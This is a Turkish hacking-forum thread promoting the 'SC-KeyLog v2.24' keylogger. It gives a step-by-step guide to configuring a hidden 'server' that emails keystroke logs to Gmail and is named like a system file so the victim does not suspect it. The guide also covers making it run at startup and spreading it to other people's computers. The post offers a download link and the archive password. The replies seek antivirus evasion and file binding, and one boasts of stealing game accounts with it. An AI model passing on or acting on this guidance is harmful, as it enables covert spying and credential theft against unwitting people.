SC-KeyLog v2.24 !! Uğraştığınıza Değecek kadar Mükemmel !! Bakmadan SAKIN geçmeyin;)

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

TuRK_HaRD

нα¢кιηg αяαşтıямα¢ıѕı
Reaction score
0
Yeni bir keylogger tanıtımı ile tekrar buradayım.. Dönüşümün ardından sizlere en iyiyi

sunmak adına yaptığım araştırmalar sonucu, hh üyelerinin ağzının tadına uygun gerçekten

kaliteli bir keylogger'ı tanıtıyorum..

Programımız yine server mantığı ile çalışıyor, detaylı ve anlaşılır log kayıtları var ve

sorunsuz olarak gmail'lerinize log'lar istediğiniz zamanlarda yollanıyor.. İlk olarak

programızın bilgisayarımız üzerindeki setup'ını çalıştırıp makinamıza kuralım.. ardından ilk

açılışta aşağıdaki gibi bir pencere ile server ayarlarına başlıyoruz.:

sc_1.jpg

Next diyerek programın nelerin kaydını tutacağını belirliyoruz.. fazla detay isteyenler hepsini işaretlesin:

sc_2.jpg

ardından log'ların hangi mailden hangi mail adresine yollanacağını yazıyoruz, tavsiyem

gmail'dir, sorunsuz olarak spam klasörüne kayıtlar geliyor çünkü.. ayrıca kayıtların ne kadar

zaman aralığında maile gönderileceği de ayarlanıyor.. resimde 10 dakikada bir kayıtlar

istenmiş, siz de gün saat dakika şeklinde ayarlayabilirsiniz..:

sc_3.jpg

diğer penceremizde smtp server'larını bulamamız gerekiyor.. Program bunu bizim yerimize

yapıyor, Search butonuna basarak gmail için smtp serverları bulabilirsiniz.. Resimdekilerin

hepsi çalışıyor, isterseniz içlerinden birini seçerek Test butonuyla deneyebilirsiniz de..:

sc_4.jpg

Installation messages kısmına tik atmıyoruz.. Alt kısımdan windows'un server'ı hangi isimle

çalıştıracağını seçiyoruz.. bir sistem dosyası ismi seçelim ki kurbanımız şüphelenmesin:

sc_5.jpg

bir sonraki penceremizde 6 haneli bir şifre belirliyoruz, programı yalnızca şifreyi bilen

kişilerin çalıştırabilmesi için:

sc_6.jpg

ardından server'ımızın nerede ve hangi isimle oluşacağını belirliyoruz:

sc_7.jpg

son olarak aşağıdaki gibi seçenekleri işaretleyerek server'ımızın kurulumunu tamamlıyoruz

ve yönetim programı açılıyor..:

sc_8.jpg

aşağıdaki gibi klasör penceresi açılıp server görünecektir:

sc_klasor.jpg

kurbanımıza bu ayarlar ile yedireceğimiz server budur.. başka ayarlar ile farklı serverlar da

hazırlayabilirizi, yine yukarıdaki işlem basamaklarını uygulayarak..

Şimdi yönetim programımızı inceleyelim:

sc_ana.jpg

Buradaki ayarların geneli eğer keylogger server'ını kullandığınız makinada açtı iseniz işe

yarayacaktır.. Başka bir makinada server'ı açtıysanız bu ayarlar geçersizdir..

View log ile eğer server kullandığınız makinada açık ise o anki logları görebilirsiniz..

Remove SC-KeyLog engine ile eğer makinada server'ı çalıştırdıysanız bunu

temizleyebilirsiniz..

At Startup seçeneği işaretli ise keylogger bilgsayar her açıldığında aktifleşecektir..

Gmail'imize gelen ilk mail'den de bir örnek gösterelim.. Bu server'ın kurbana yedirildiğini ve

çalıştığını gösterir:

sc_gmail.jpg

Anlattığım işlem basamaklarını harfiyen yerine uygularsanız kesim bir başarı elde

edeceksiniz, bizzat deneyip çalıştığını onaylıyorum. İşlev ve çalışma açısından oldukça

kaliteli bu programı dönüş hediyesi olarak sizlere sunuyorum..

Download = http://rapidshare.com/files/39474726/SC-KeyLog_v2.24__by_TuRK_HaRD.rar

rar pass = turk_hard

Sorularınızı buradan alabilirim, şimdilik kolay gelsin..

(PROGRAMIN ANLATIMI TAMAMEN TARAFIMA AİT OLUP İZİNSİZ KOPYALANMAMASINI RİCA EDİYORUM..)

Beğendiğiniz paylaşımlarda
TEŞEKKÜR BUTONU'nu kullanmayı unutmayın..

kardeş sc keylog indirdim buradan ama açamıyorum
şifre istiyo
crc şifresini giriyorum yine açmıyo

blacksun77' Alıntı:
kardeş sc keylog indirdim buradan ama açamıyorum
şifre istiyo winrar

turk_hard denedinizmi ?

Teşekkürler emeğine sağlık..
Ama bir dosya ile birleştirme veya ikon değiştirmeolayı yok sanırım..
Bu durumda yedirme çok zoroluyor..
Habir de serverin av ler ile arasınasıl? :goz:

hellboy726' Alıntı:
turk_hard denedinizmi ?

paşam sana bi soru sormuştum nessekonusunda ilgilenir misin?
Teşekkürler..

Ellerine saGlık..Güzel çalışma olmuş ;)

ya bide şu masa üstünün resimlerini çeken arasıra web camı otomatik açıp resim çekip yolladığı maile onlarıda ekleyen özellikleri olan bi program olsa varya çooooook süper olurdu yokmu kardeşlerim böyle bi program ya ama kurması bunun gibi kolay olucak port açmakla falan uğraştırmayan

winrar şifresini bilen yokmu
indirdim ama çalıştıramaıyorum

meala ben serveri kendi pc imde oluşturdum ark attım çalışırmı ?

burcu_721' Alıntı:
meala ben serveri kendi pc imde oluşturdum ark attım çalışırmı ?

server'ı oluştururken mail ayarlarını doğru yaptı isen, yazdığın mail'e server'ın çalıştığına

dair bir mesaj gelmesi lazım, spam klasörüne gitmiş olabilir.. aksi taktirde bir peoblem

oluşmuştur.. işlem basamaklarını dikkatli takip et, eksik kalmasın..

ben serveri kendi makinemde çalıştırdım, mükemmel çalışıyor...
keşke simge değiştirebilme olsaydı, yada dosya ile birleştirme..
ama yine de log lar muntazam, teşekkürler turk_hard

Server windows açılışında tekrar çalışmıyor yaa, bu kötü..
Acaba ben yanlış bişey mi yaptım..

Türk AHrd bir iki sorum olucak
1. biz şimdi serveri muntazam şekilde oluşturduk kendi pc mizde diyeim programı Pc yüklüyoruz ya serveri oluşturduktan sonra programı silersek serveri çalıştırırsak server Çalışırmı ?
2.mesala Ben serveri kendi pc oluştrdum açtım açtım serveri rar layıp başkasına yolladım olurmu ?

burcu_721' Alıntı:
Türk AHrd bir iki sorum olucak
1. biz şimdi serveri muntazam şekilde oluşturduk kendi pc mizde diyeim programı Pc yüklüyoruz ya serveri oluşturduktan sonra programı silersek serveri çalıştırırsak server Çalışırmı ?
2.mesala Ben serveri kendi pc oluştrdum açtım açtım serveri rar layıp başkasına yolladım olurmu ?

kendi makinanda server'ı bir kere oluşturacaksın, sonra bu server'ı kendi makinanda

açmadan diğer pc'lere yayacaksın.. kendi makinanda açarsan kendi log'ların da mail adresine

gelir, bi manası yok.. eğer kendi pc'ni de izlemek istiyorsan, mesela başkaları da

kullanıyordur makinanı bunun için olabilir, o zaman server'ı kendi makinanda da açabilirsin..

kasdettiğin keylogger'ın yönetim programı ise bunu silmen server'a bi zarar vermez, yine

başkaları açarsa server'ını log'lar senin mailine gelecektir..

Türk hard galiba pc reset atıınca Server çalışmıyo acaba bendemi bi yanlışlık yaptım ?

ilk yaptımde çok güzel log lar geldi ama reset attıktan sonra gelmiyo ?

deepfreeze olmasın makinada ?

yok kendi pc im zaten
deep freeze olsa bilie Deep freez İnaktiv hale getirmek için Program var deep yok pc de ama reset attıktan sonra çalışmadı ilginç :S

server'ı kendi pc'nde çalıştırdığın zaman yönetim penceresindeki "At Startup" seçeneği

işaretli olmalı.. bu anlatımda var dikkat edersen, gözünden kaçmış sanırım..

Tmm oldu saol Turk_Hard Sen Olmasan ;)

Turk_Hard her zamanki gibi yine çok ii işLer yapmışsın :) Cok tşk ederim sayende şu anda KnightOnline'da gayet iyi durumdayım ;) Ellerine sağlık.
Sorun Halloldu tşkler :)

Tamam anladık bizde ko oynuyoruz bizde Char soyuyoruz
ama bunu övünmek için buraya yazma !

Turk_hard son bi sorum var
<< 04-06-07 18:43:35 EXTREME OVERCLOCKER(O) - Konuşma >> s]lal'en'z'
<< 04-06-07 18:43:37 EXTREME OVERCLOCKER(O) - Konuşma >> s'k't'm

İng karakter geliyor bunun bir çözümü varmı ?

"Türk Hard" güzel iş yapmışsında acaba bu keylog antilere yakalanıyor mu? :)

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri